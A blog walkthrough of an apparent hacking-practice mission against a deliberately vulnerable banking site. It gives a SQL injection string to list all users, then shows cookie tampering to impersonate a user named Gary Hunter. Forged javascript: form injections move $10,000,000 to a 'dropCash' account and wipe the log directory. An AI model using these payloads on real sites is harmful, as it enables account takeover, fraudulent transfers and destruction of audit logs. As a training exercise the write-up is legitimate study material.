Cookie Injection,Java Script Injection & Sql Injection Method

Information

From the navigation and source code of pages, we gather following information:

Description Page Fields
Register pages Register.php > register2.php
  • <input type=”text” name=”username” maxlength=10>
  • <input type=”password” name=”password” maxlength=50>
  • <textarea name=”desc” rows=5 cols=20 maxlength=255>
Login pages login1.php > login2.php
  • <input type=”text” name=”username” value=”Enter Username”>
  • <input type=”password” name=”Password” value=””>
Purge files cleardir.php <input type=’hidden’ name=’dir’ value=’loginSQLFiles’>
Transfer money from one account to another movemoney.php
  • <input type=’text’ name=’TO’ value=’Username To Give Money To’>
  • <input type=’text’ name=’AMOUNT’ value=’Amount Of Money To Move’>

Authentication cookie (created after successful authentication):

  • accountUsername=<login>
  • accountPassword=<password>

Our target:

  • Name: Garry Hunter
  • Transfer $10,000,000 into the account dropCash.
  • Log directory: logFiles

Objective 1: Find the account of Gary Hunter

First create your own account and log in. Once done, type following command in the url bar: javascript:alert(document.cookie); It shows our cookie value, indicating that the site is vulnerable. Then connect to user info page and enter a SQL injection to show the list of all users: ‘ or ‘a’=’a.

By scrolling down, we find:

GaryWilliamHunter : — $$$$$ —

The 2 values are separated by a colon:

  • Before colon: the login (GaryWilliamHunter)
  • After colon: the description (– $$$$$ –)

Objective 2: Move the $10,000,000 into the account dropCash

By entering following code in the URL, we see that the site is vulnerable to cookie injection because it displays in clear cookie information.

javascript:alert(document.cookie);

Install Firebug and Firecookie for Firefox. We then have to change value of cookie named “accountUsername” to “GaryWilliamHunter” and use following JS injection (copy/paste in the URL):

javascript:void(document.write(‘<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>’))

It will dynamically write a form on the page, containing necessary values for a transfer:

  • FORM ACTION: movemoney.php, as specified in the exercise
  • FROM: value taken from the modified cookie (GaryWilliamHunter)
  • TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
  • AMOUNT: value specified in the exercise. We know this field from the information we gathered.

By validating the form, it will complete the stage.

Objective 3: Clear The Logs, They’re held in the folder ‘logFiles’

Copy/paste following code in the URL:

javascript:void(document.write(‘<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value=”cover my tracks” /></form>’))

PS: You can also use the Firefox add-on “Tamper Data” or Google Chrome’s “Inspect Element” option instead of Firecookie and Firebug.

About the Author

Aloha, I'm Amit Ghosh, a web entrepreneur and avid blogger. Bitten by entrepreneurial bug, I got kicked out from college and ended up being millionaire and running a digital media company named Aeron7 headquartered at Lithuania.

Related Posts

Basic Mission 2   I can again call you a pretty dumb as per you are now again viewing the walk...